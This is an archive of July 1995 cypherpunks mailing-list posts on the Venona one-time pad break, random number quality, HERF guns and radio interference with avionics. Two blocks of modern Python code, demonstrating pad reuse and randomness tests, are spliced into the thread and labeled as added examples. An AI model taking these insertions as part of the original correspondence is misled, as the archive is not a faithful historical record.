~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 12 Jul 95 08:09:07 PDT
To: cypherpunks@toad.com
Subject: Re: QED_jak
Message-ID: <199507121508.AA11385@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> says:

> John Young writes:
> >    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
> >    Clues That Led to Code-Breaking."
> > 
> The reports claimed the spies were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?
> 
> .pm

It wasn't completely random.  They reused some code material:

   But Mr. Gardner and his colleagues found patterns in
   unrelated messages. They were proof that exhausted Soviet
   code-makers had repeated themselves ...

Still, it's pretty impressive that the NSA was able to find this.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 08:06:22 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121459.AA0062320@netman.eng.auburn.edu>
Message-ID: <9507121505.AA10601@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> 
> Hmm.. I'm not sure I'd want to stand too close when one of those
> things goes off, but it would be an interesting demo. :)
> 
> Maybe behind an EM shield.. ;) 

What is it, exactly, that you imagine could happen to you? You realize
that you can expose humans to pretty powerful electromagnetic fields
without any noticeable effect unless the frequency happens to be one
that their tissues absorb.

> I think there was a question of some microelectronics being permanently
> damaged because of fusion at the MOS level (burning through the
> gate),

To do that requires that you transfer energy from your device into the
computer you are attacking. How do you propose to do that?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 08:25:41 PDT
To: cypherpunks@toad.com
Subject: Re: QED_jak
Message-ID: <199507121525.LAA08710@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@imsi.com ("Perry E. Metzger") on 
Wed, 12 Jul 10:45 AM


>The reports claimed the spies were using one time pads 
>in some flawed  manner, but did not explain very well 
>what the problem was. Does  anyone out there know?


The NYT-reported ceremony was on C-SPAN (1 or 2) last night; I 
saw only a snippet of Moynihan mumbling. Maybe there will be a 
replay sometime today that may provide clues to the sharp ear.


Held at the CIA, the clip showed lots of backs of heads of 
creme de les zipped-lipped crypto-slaves. Unctuous Freeh, 
Deutch, the spy-brass were all there, lipping the New Yarper -- 
an ouvert HERF-zap would have spattered their sucrets.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 10:29:55 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <Pine.3.89.9507121149.A3180-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:

>  This just goes to show that we live in a world of electromagnetic soup.
> We really don't know how it affects the body long term, or whether, having
> more mission or life critical electronics could be interacting with other
> devices. This was the theme of the program.

There have been many examples of this - several cases of hams having 
their pacemakers go nuts when they keyed their transmitters, etc.  But 
that doesn't mean that aviation avionics are sensitive - in fact, devices 
that are specifically designed to receive RF of a specific frequency are 
usually designed to reject RF of a different frequency, especially type 
accepted radios (the avionics package is required to be type accepted for 
that particular class of service, which includes spurious rejection, 
intermod products down XX dB, etc.)

>  Another example was on an airplane (several of them.. older ones mostly
> I believe) pilots would occasionally lose instruments (VLS, etc) when
> passengers would activate portable transistor radios and such. Particularly
> radios.. But there was another case involving a portable computer.. These
> cases have been documented. It's a good thing the plane wasn't on a 
> landing approach during a storm, or things could've gone very bad very
> quickly.

A transistor radio puts out such a minute amount of RF (at 455 KHz and/or
10.7 MHz, the IF freqs of the radio) that most instruments designed to
pick up RF can't detect this stuff from more than a few feet away.  FCC
regulations say that if your avionics is being interfered with, it's YOUR
problem, not the guy that just turned on his radio.  If someone's avionics
is being interfered when I turn on an AM/FM transistor radio, then I'd say
that he either needs to get his avionics fixed, or he's using illegal
consumer-grade radios (which are usually junk anyway - even much ham radio
gear is garbage, unfortunately), instead of the type-accepted stuff he's
supposed to be using.  I'd be interested in finding out more about this
guy and his "VLS-jumped-when-someone-turned-on-their-radio" story. 

>  I heard about the portable computer via a different source. The guy
> kept turning his computer on. The instruments would do a little dance.
> The captain would tell the stewardess, she would tell the passenger, he
> would turn it off for a while. Then, he would turn it on and repeat..
> Until finally he refused to turn it off, so they confiscated it and
> returned it at the end of the trip. Urban Legend? maybe..

The early laptop computers would put out an amazing amount of crap.  I 
used to have a Zenith laptop, and when I'd turn the thing on, it'd throw 
out junk that I could hear on every radio in the house, including the 2m 
FM stuff, the HF rig, and I could even hear it out in my car on the 2m 
mobile!  I can believe it, but that's no excuse for just saying, "well, 
let's just ban all of it..."

>  Believe what you want, but investigate the reports before dismissing it
> out of hand as propaganda. I'd rather stay alive than rely on "theoretically
> it shouldn't matter." :)

My point is, it's not your, nor my responsibility to refrain from using 
our radios - it's the responsibility of the avionics people to make sure 
that their radios are within spec and are kept that way.  If they don't 
bother, that's not my fault.

> Keep in mind that newer planes (767, 757) let you do anything you want
> while the plane is in flight (but not while landing or takeoff), so they
> probably build better instrumentation and cabin shielding into the planes
> these days. If they say keep it off, chances are they have a good reason..

Again, my contention is that they don't.

> If you find categorical evidence to the contrary, I'm sure I would be very
> relieved to see it posted here. (rather than wondering if somebody
> in one of the 30 rows ahead of me might decide he knows better)

The ng rec.radio.amateur.misc might have some additional stuff in the FAQ,
and the ARRL certainly has a mountain of information on this - I'll poke
around.  'echo help|Mail info@arrl.org' might yield some interesting
things... 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 12 Jul 95 08:34:40 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
Message-ID: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

** How a conservative learned to like NPR -


Listening to Public Radio this morning I caught a story about the 
NSA's recent release, or pending release of some 2000 - 2200 
documents bearing decoded Soviet communications.  These were the 
result of a long running communications and signals intelligence 
program conducted by the U.S., and thus, by the NSA and its 
predecessors.  Some of the documents to be released include 
communications quite damaging to the Rosenbergs, who were executed 
for espionage and selling U.S. atomic "secrets" to the Soviets.  
This is, in fact, the key attraction in the documents.

More interesting than all this was the discussion with the deputy 
director of the NSA in which he described the communications 
collections program which continued from the 1950's all the way 
into the 1980's.  What interested me most, aside from the fact that the 
NSA was speaking so candidly, and in my opinion foolishly so, 
about the program (even given their new public relations 
awareness) was a brief discussion of what methods were used in 
cracking the Soviet code.

While it was not defined specifically, it was suggested that the 
majority of the messages were communications between the embassies 
and Moscow.  As a result, the procedural and cryptologic algorithm 
was likely very entrenched as a method, and lacked variation 
because of the massive coordination required to switch methods in 
embassy to home country secure communications.  While I do not 
know how much was puffing, I suspect that it is safe to say that 
the basic method the Soviets were using looked something like 
this.

Plaintext -> Codebook number substitution pass -> One time pad 
pass.

The most difficult, and in the words of the deputy director, 
"remarkable" task was, of course, attacking the last layer in the 
encryption, and the first layer in the decryption process, the 
random series on the one time pad, which, in the words of the 
public spook, "was not so random after all."  The fixed codebook 
substitution perhaps had a high overhead in the initial 
computation, but once analyzed the first time the entire cipher is 
a wash until a new codebook or random number generation method is 
used.

** "Captain, the energy is structured in a pattern I have never 
     before encountered." -

So what does this little disclosure tell us about NSA 
capabilities?

Most obviously that they have extremely sophisticated "random" 
number analysis abilities.  1950-1980 is a long time to practice, 
and develop specialized hardware for this purpose.  The discussion 
of the value of specialized hardware gains having been applied on 
this list to RC4 analysis, its value is still somewhat of a 
mystery to me with reference to random number analysis.

In any event, it is safe to assume that the NSA has a very large 
section dedicated to this entire pursuit, and moreover, that the 
Soviets probably were not "petty" random number generators.  
Perhaps laziness got the best of them, but I am inclined to think 
they conducted this program, at least at first, like any other 
massive communist "for the glory of the state" program--  i.e., 
with crippling dedication.

To me this prompts the questions: How random is random, and how 
random is "cryptographically random?"

I don't know much about the mechanics of cryptographically strong 
random number generation, but considering the enormous effort the 
NSA has put into the analysis of same, I suspect it is in 
everyone's best interest to know more.

Consider:  Now that the NSA has gone public with the program one 
must believe this prima facie evidence that the program is no 
longer of use against the Soviets.  I suspect that a lot of 
dedicated hardware, already paid for, is probably sitting about 
looking for a use.  "Hey Louie Freeh, any idea what we can do with 
all this idle equipment?"

So for the cypherpunks, my first suggestion is a long look at 
exactly how strong the "cryptographically strong" random numbers 
might be.  Certainly we are not random number ignorant, but how 
random number savvy are we?

Perhaps someone with the equipment and the computer time might 
conduct a bit of an experiment.  Maybe lifting the random number 
generators from common cryptographic applications like CryptDisk, 
Curve Encrypt, PGP, Secure Device, and taking a massive sample to 
identify trends in the "random" data might be a good idea.

Even those processes that employ some physical component might 
have some trends that could fall into patterns.  Even with hard 
hashes of random seeds, could seed patterns create patterns in the 
actual random data?  I must suspect so.

Perhaps a piece of code which could be distributed far and wide to 
'punks and others which might generate random data on different 
machines with different hardware and different users and generate 
an export file to be submitted to a Web Page or something.  We've 
seen the tremendous value Web Pages have in bringing users 
together to contribute processor time for the RC4 project, what 
about random number generation time?

One of the first attacks on short-wave radio "number stations" 
(for the uninitiated, most are based in South America and read off 
long sets of code numbers, usually in Spanish) was with the 
assumption that a one time pad had been used.  The result?  An 
analyst determined that the "random" numbers for several stations 
were one time padded with "random" poundings on an old typewriter.  
Even if not broken, this immediately identified several stations 
as related by the use of the same one time pad generation method 
(which is sensitive enough that unrelated stations are quite 
unlikely to have been privy to the method) and thus provided 
tremendous traffic analysis information.  What does our random 
data tell the world about us?

Could not the bits in PGP keystroke timing subroutines fall into a 
subtle pattern?  Enough of one to make someone's job a lot easier?  

When you whirl that mouse around the screen to generate random 
numbers for CryptDisk, do you start with a counter clockwise 
circle?  If you're right handed you're likely to.

In the scheme of things, these might be pretty good clues to 
someone who does nothing but random analysis all day long in a 
cubicle with a frighteningly quick piece of specialized hardware 
in the next room.

** "He's in a tough position.  If he announces he's running,
     everything becomes a political move, if he announces he
     isn't, his administration becomes a lame duck effort.
     Perhaps he should say nothing" -

My estimation of the NSA's new public image, which amazed me at 
first, prompted me to suggest that the bulk of the hyper-sensitive 
work done there has already been moved to another outfit.  To go 
from "No Such Agency" to a politicized and highly public 
organization with a public relations department and press releases 
in just under 30 years is a dramatic change for a secret agency.

In many ways it is not a poor move.  The agency has grown quite 
large, and it has become impossible to hide.  In addition, the 
public is much more likely to be receptive to an agency which 
appears-- in public-- to have some worth.  Cryptography is a 
complex concept, enigmatic at best for the general public.  The 
public relates much better to the capture of spies and the foiling 
of the Soviet Union than to an agency which is too secret to 
acknowledge.

Public opinion tilting to the NSA might be a bad thing for 
Cypherpunks.  When the NSA says key forfeiture is required, the 
public is much more likely to swallow the pill from an agency that 
uncovers traitors, protects our national interest, and has a cool 
museum that you can visit to boot.

Mr. Young rightly pointed out on this list that part of the coin 
the intelligence community sells, the demand for which moves 
novels by the millions, is the feeling of inclusion in a select 
group, a shared secret.  How elegant the way the National 
Cryptological museum was opened.  No fanfare, no publicity, no 
invitations, just there to be discovered at first, like a little 
secret.  Stuck in an old motel, barely visible from Route 32, 
dwarfed by the massive NSA complex.  Talk about public relations 
coup.  Classic intelligence, release what is worthless or nearly 
worthless, create the impression it is rare, make cursory efforts 
to obscure it- efforts you know will eventually fail, and you have 
created something coveted.  Wait a while, and then when it has 
been discovered, uncovered, publicized, put out a brown and white 
sign:  "National Cryptologic Museum."  What does DeBeers do any 
differently?

So the NSA has become a political tool.  A mouthpiece, and in a 
subtle way, a propaganda machine.  (Just keep the lead counsel out 
of the public eye guys.  He keeps screwing things up.  Do a 
Stephanopoulos or Hillary Clinton on him.  Time for him to go 
behind the scenes).

We've long been predicting the clash between crypto and 
government, I doubt government sees it much differently, though 
perhaps through the foggy lenses of an entity used to getting its 
way through coercion.  I suspect they are likely to do themselves 
major damage with simple hubris.

Still, the signs are out there.  They are more and more public 
every day.  I think cryptography scares the administration.  It 
certainly scares the FBI.

So I ask some of the same questions I asked here a few months ago.

Where are the stealth PGP hacks?
Where are the more subtle stego programs?
Why aren't there totally transparent strong crypto programs which
   don't advertise the recipient right in the header?
Why isn't crypto prepared to weather the storm of an outright ban?

Sure, fight on the side of keeping crypto legal, but prepare for 
the worst.

The fact that everyone and their mother drank didn't keep 
prohibition from being initially passed.  How is it people think 
it will be the sure fire crypto ban deterrent?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.
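
[Added example, not part of any post in this thread.] A toy model of the "codebook pass -> one time pad pass" pipeline sketched above, showing why the reuse of pad material mentioned in David Mandl's reply is visible to an analyst who knows neither the codebook nor the pad. The codebook, the two messages, the 5-digit group size and all function names are constructed for illustration and are not taken from any historical system.

```python
"""Additive one-time pad over codebook digits: why a reused pad page shows.

Constructed toy model. The codebook, messages and group size are invented
for this example and do not come from any historical system.
"""
import math
import secrets

GROUP = 5  # digits per code group (assumption of this example)

# Constructed codebook: each word maps to one 5-digit group.
CODEBOOK = {
    "AGENT": "17204", "COURIER": "58391", "REPORTS": "40962",
    "ARRIVED": "23357", "STOP": "90418", "MEETING": "36675",
    "CONFIRMED": "83015", "CANCELLED": "06648", "SEND": "61283",
    "FUNDS": "72530", "PAPERS": "95126",
}

# Two constructed, unrelated messages that share only routine vocabulary.
MSG_A = "AGENT REPORTS STOP MEETING CONFIRMED STOP SEND FUNDS STOP"
MSG_B = "COURIER ARRIVED STOP MEETING CANCELLED STOP SEND PAPERS STOP"


def encode(message):
    """Codebook pass: words -> flat list of decimal digits."""
    return [int(d) for word in message.split() for d in CODEBOOK[word]]


def new_pad(length):
    """A fresh pad page drawn from the operating system's CSPRNG."""
    return [secrets.randbelow(10) for _ in range(length)]


def encipher(code_digits, pad):
    """Pad pass: digit-wise addition mod 10 (no carries)."""
    if len(pad) < len(code_digits):
        raise ValueError("pad shorter than message")
    return [(c + k) % 10 for c, k in zip(code_digits, pad)]


def difference(a, b):
    """Digit-wise (a - b) mod 10 over the overlapping length."""
    return [(x - y) % 10 for x, y in zip(a, b)]


def zero_groups(ct_a, ct_b):
    """Count aligned groups where the two ciphertexts are identical.

    If both messages used the same pad digits, the pad cancels in the
    difference, and every position where they carry the same code group
    yields an all-zero group. Returns (hits, groups_compared).
    """
    diff = difference(ct_a, ct_b)
    groups = [diff[i:i + GROUP] for i in range(0, len(diff) - GROUP + 1, GROUP)]
    return sum(1 for g in groups if not any(g)), len(groups)


def chance_probability(hits, n_groups):
    """P(at least `hits` all-zero groups) if the two pads were independent.

    With independent uniform pads each difference group is uniform, so an
    all-zero group appears with probability 10**-GROUP.
    """
    p = 10.0 ** -GROUP
    return sum(math.comb(n_groups, k) * p ** k * (1 - p) ** (n_groups - k)
               for k in range(hits, n_groups + 1))


if __name__ == "__main__":
    code_a, code_b = encode(MSG_A), encode(MSG_B)
    page = new_pad(len(code_a))
    cases = {
        "same pad page": zero_groups(encipher(code_a, page),
                                     encipher(code_b, page)),
        "fresh pad pages": zero_groups(encipher(code_a, page),
                                       encipher(code_b, new_pad(len(code_b)))),
    }
    for label, (hits, total) in cases.items():
        print(f"{label}: {hits}/{total} identical groups, "
              f"chance probability {chance_probability(hits, total):.3g}")
```

The check needs only ciphertext, which is why a pad page must be destroyed after a single use: the guarantee of the one time pad rests on every key digit being used exactly once.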





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 12 Jul 95 08:40:28 PDT
To: dmandl@bear.com (David Mandl)
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <199507121418.AA21899@bear-gate.bear.com>
Message-ID: <199507121540.LAA09468@asimov.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Mandl wrote:

| For the record: It's Leuchter, Fred Leuchter.
|  
| > ago for "practicing engineering without a license."  A good rebuttal
| > of his report was written up by (I think) William McVey, in Canada.

| Ken McVay.  And dozens of other people too.  The newsgroup is
| alt.revisionism.  If you've got any interest in the "holocaust
| revisionism" phenomenon, it's well worth at least a brief look in
| there.

	Thanks for the corrections, Dave; you're correct on all these
points.

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 11 Jul 95 18:41:40 PDT
To: cypherpunks@toad.com
Subject: Re: My Experience with Moderated Lists and Groups
In-Reply-To: <199507111647.JAA01880@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950712114054.17852M-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jul 1995, Bill Stewart wrote:

> Remember when the alt.network got started?  One of the first two groups
> that led to its founding was alt.sources [...]
> The other was one of the recipes newsgroups, where there was a bit more
> controversy.

I thought one of them was alt.drugs?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 08:50:35 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
Message-ID: <9507121550.AA10682@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> More interesting than all this was the discussion with the deputy 
> director of the NSA in which he described the communications 
> collections program which continued from the 1950's all the way 
> into the 1980's.

There may be a misunderstanding -- just to be clear, the implication
was that they were working on some of the 1950s traffic into the
1980s, and not that there was any new traffic available of late...

> In any event, it is safe to assume that the NSA has a very large 
> section dedicated to this entire pursuit, and moreover, that the 
> Soviets probably were not "petty" random number generators.  

I've heard that standard 1920s-1950s one time pad generation
techniques involved telling lots of secretaries in the code section to
type numbers at random onto carbon paper forms. No joke.

Perry
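
[Added example, not part of any post in this thread.] A small version of the experiment Black Unicorn proposes (sample a generator and look for trends), applied to the kind of hand-typed pad digits Perry describes. The "typist" here is a simulation built on two assumptions of this example: a person avoids typing the same digit twice in a row and favours nearby digits. The function names and thresholds are likewise this example's own.

```python
"""Two quick statistical checks on a stream of decimal pad digits.

Added illustration. The typist model is simulated, and the thresholds are
the standard critical values at the 0.001 level.
"""
import math
import random
import secrets
from collections import Counter

CHI2_CRIT_DF9 = 27.877  # chi-square critical value, 9 d.o.f., p = 0.001
Z_CRIT = 3.291          # two-sided normal critical value, p = 0.001


def to_digits(text):
    """Keep only the decimal digits of a string, as ints."""
    return [int(c) for c in text if c.isdigit()]


def chi_square_digits(digits):
    """Frequency test: chi-square of the digit counts against uniform."""
    expected = len(digits) / 10
    counts = Counter(digits)
    return sum((counts.get(d, 0) - expected) ** 2 / expected
               for d in range(10))


def repeat_z(digits):
    """Serial test on adjacent pairs.

    For independent uniform digits each adjacent pair is equal with
    probability 0.1. Returns (repeat_count, z_score).
    """
    pairs = len(digits) - 1
    repeats = sum(1 for a, b in zip(digits, digits[1:]) if a == b)
    z = (repeats - 0.1 * pairs) / math.sqrt(pairs * 0.1 * 0.9)
    return repeats, z


def assess(digits):
    """Return the list of tests the sample fails (empty list = no finding)."""
    if len(digits) < 100:
        raise ValueError("need at least 100 digits for these approximations")
    findings = []
    if chi_square_digits(digits) > CHI2_CRIT_DF9:
        findings.append("frequency")
    _, z = repeat_z(digits)
    if z < -Z_CRIT:
        findings.append("repeats-low")   # doubles avoided: typist-like
    elif z > Z_CRIT:
        findings.append("repeats-high")  # runs of one digit: stuck source
    return findings


def typist_sample(n, rng):
    """Simulated human 'random' typing (assumed model, see lead-in)."""
    out = [rng.randrange(10)]
    while len(out) < n:
        prev = out[-1]
        options = [d for d in range(10) if d != prev]
        weights = [3 if abs(d - prev) <= 2 else 1 for d in options]
        out.append(rng.choices(options, weights)[0])
    return out


if __name__ == "__main__":
    samples = {
        "simulated typist": typist_sample(2000, random.Random(1995)),
        "OS CSPRNG": [secrets.randbelow(10) for _ in range(2000)],
    }
    for name, digits in samples.items():
        repeats, z = repeat_z(digits)
        print(f"{name}: chi2={chi_square_digits(digits):.1f} "
              f"repeats={repeats} z={z:+.1f} findings={assess(digits)}")
```

A sample can have perfectly even digit counts and still fail the pair test, so passing a frequency check alone says little; and passing both checks shows only the absence of these two defects, not that the source is unpredictable.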




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 09:58:49 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <Pine.3.89.9507121027.B1475-0100000@khijol>
Message-ID: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>On Wed, 12 Jul 1995, Doug Hughes wrote:
>
>> Go see Winn Schwartau talk about HERF guns sometime. He passed around
>> a picture of a device for < US$500 that could crash any computer within
>> 50 yards..  Then again, it isn't too good for the person firing the gun
>> either.. (mega EM emissions).
>
>That all depends on the power level, and the emission pattern of the 
>device, and the frequency.  I've been working within 10 feet of a dipole 
>being fed by a 1kW amplifier before, and it didn't make me sterile (but 
>it might've loosened a filling or two <grin>).
>
Agree!

>> The parts are available if you know what to get. a VERY enlightening
>> and frightening presentation. I don't think he personally has built one.
>> His presentation contained a presentation on TEMPEST emissions, and
>> low level EM field effects on sensitive equipment problems too (a PBS
>> documentary - a VERY compelling presentation of why you should never
>> use walkman/CD players/radios/electronics equipment on airplanes if
>> they say not to, and you value your life)
>
>This sounds like absolute propaganda.  If you do the calculations, you'll 
>see that a 1 watt transmitter sitting 100 feet away from your target will 
>generate an EMF less than that 1000kW ERP TV transmitter array you just 
>flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
>falling out of the sky, and we don't.  Add to that the HF and VHF 
>transmitting equipment in the cockpit, plus the microwave ovens in the 
>fore and aft, PLUS the phones they have on the plane, and it adds up to a 
>sizeable amount of RF bouncing around the cabin without you and your 2m 
>talkie with its 6 dB loss rubber duckie.
>
>Now, if every passenger fired up their 2m talkies, that might pose a 
>problem, but then again every passenger wouldn't be using one, would they?
>
>Again, sounds like "we want to totally control your environment for your 
>safety (actually, to minimize our liability)" crap.

If you saw that PBS documentary (they want $20,000 for rebroadcast by the 
way). It was an 87 or 88 or something like that. It would make you
a believer. There was a lady in a van that whenever she used her cellular
phone, her son's breathing apparatus (lung impaired) went into alarm.
 There was another case at a hospital pre-natal care ward near the main
entrance to the hospital. Several occasions when a local bus loop went
by, and the guy happened to be talking on the intercom of the bus, several
of the units in the ward went into alarm and failed (they had a tough time
tracking that one down by the way). 
 Wheel chairs for handicapped people were sensitive. They held a cellular
phone about a foot from a wheel chair control and it started spinning around
and generally going out of control. (The guy's wheel chair had gone out of
control and run him off a heavy slope once and he almost died. it was
unproven whether it was electromagnetic or just a defect).
 This just goes to show that we live in a world of electromagnetic soup.
We really don't know how it affects the body long term, or whether, having
more mission or life critical electronics could be interacting with other
devices. This was the theme of the program.
 Another example was on an airplane (several of them.. older ones mostly
I believe) pilots would occasionally lose instruments (VLS, etc) when
passengers would activate portable transistor radios and such. Particularly
radios.. But there was another case involving a portable computer.. These
cases have been documented. It's a good thing the plane wasn't on a 
landing approach during a storm, or things could've gone very bad very
quickly.
 I heard about the portable computer via a different source. The guy
kept turning his computer on. The instruments would do a little dance.
The captain would tell the stewardess, she would tell the passenger, he
would turn it off for a while. Then, he would turn it on and repeat..
Until finally he refused to turn it off, so they confiscated it and
returned it at the end of the trip. Urban Legend? maybe..

 Believe what you want, but investigate the reports before dismissing it
out of hand as propaganda. I'd rather stay alive than rely on "theoretically
it shouldn't matter." :)

Keep in mind that newer planes (767, 757) let you do anything you want
while the plane is in flight (but not while landing or takeoff), so they
probably build better instrumentation and cabin shielding into the planes
these days. If they say keep it off, chances are they have a good reason..

If you find categorical evidence to the contrary, I'm sure I would be very
relieved to see it posted here. (rather than wondering if somebody
in one of the 30 rows ahead of me might decide he knows better)

Disclaimer: I have absolutely no idea what kind of shielding goes into
an airplane nor any knowledge of building practices in the airline industry,
but that should be obvious. ;)

Well, I've posted enough on this, and I don't have any evidence besides
what I've seen and what I've heard from others. For all I know the
entire documentary was botched (it was shown on an evening newsmagazine
in the late 80's hosted by Connie Chung - British documentary). Now back 
to your regularly scheduled mailing list already in progress.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Ayen <ayen@access.digex.net>
Date: Wed, 12 Jul 95 09:03:47 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121444.AA10523@snark.imsi.com>
Message-ID: <199507121603.MAA04959@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


.pm tolled:
> Doug Hughes writes:
> > Go see Winn Schwartau talk about HERF guns sometime. He passed around
> > a picture of a device for < US$500 that could crash any computer within
> > 50 yards.
> 
> If it costs that little, I'd like to see one demonstrated. I've heard
> of no demonstrations of such things.
> 
> .pm
> 

Hey, if someone will point me at some (free) plans, I'll build one and 
hold a demonstration.

(I've got an old XT, a 286, a 3B1, and some monitors I'd like to blow up, 
and I've not yet blown up a pc using HERF yet (thermite--yes, HE--done 
it, lN2--yep, but not HERF.))

--doug
ayen@access.digex.net 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 11:14:57 PDT
To: perobich@ingr.com
Subject: Re: EMI (was: Re: Don't trust the net too much)
In-Reply-To: <199507121749.AA12206@poboy.b17c.ingr.com>
Message-ID: <Pine.3.89.9507121207.B3180-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Paul Robichaux wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Ed Carp said:
> 
> > This sounds like absolute propaganda.  If you do the calculations, you'll 
> > see that a 1 watt transmitter sitting 100 feet away from your target will 
> > generate an EMF less than that 1000kW ERP TV transmitter array you just 
> > flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
> > falling out of the sky, and we don't. 
> 
> Oh, yes-- we do. The Army lost a small number (two or three) of
> UH-60 Black Hawks in crashes where the flight control system suddenly
> commanded extreme pitch or attitude changes. Why? In all the crash
> cases, EMI from nearby TV or FM transmitters was found to be the
> proximate cause. The Army, and Sikorsky, immediately went to work to
> better shield the FCS from EMI.
> 
> It's interesting to note that the Navy's SH-60, a UH-60 variant, was
> designed from the start to be EMI-immune. Ships' radars operate in the
> 10-100kW range, and that's a lot of EMI when you're landing 15-20m
> away from the radar mast.

Well, I was speaking of commercial aircraft, not military, but the point 
is taken.  I haven't had occasion to use my packet radio lashup on a 
UH-60 -- yet ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Wed, 12 Jul 95 09:49:27 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
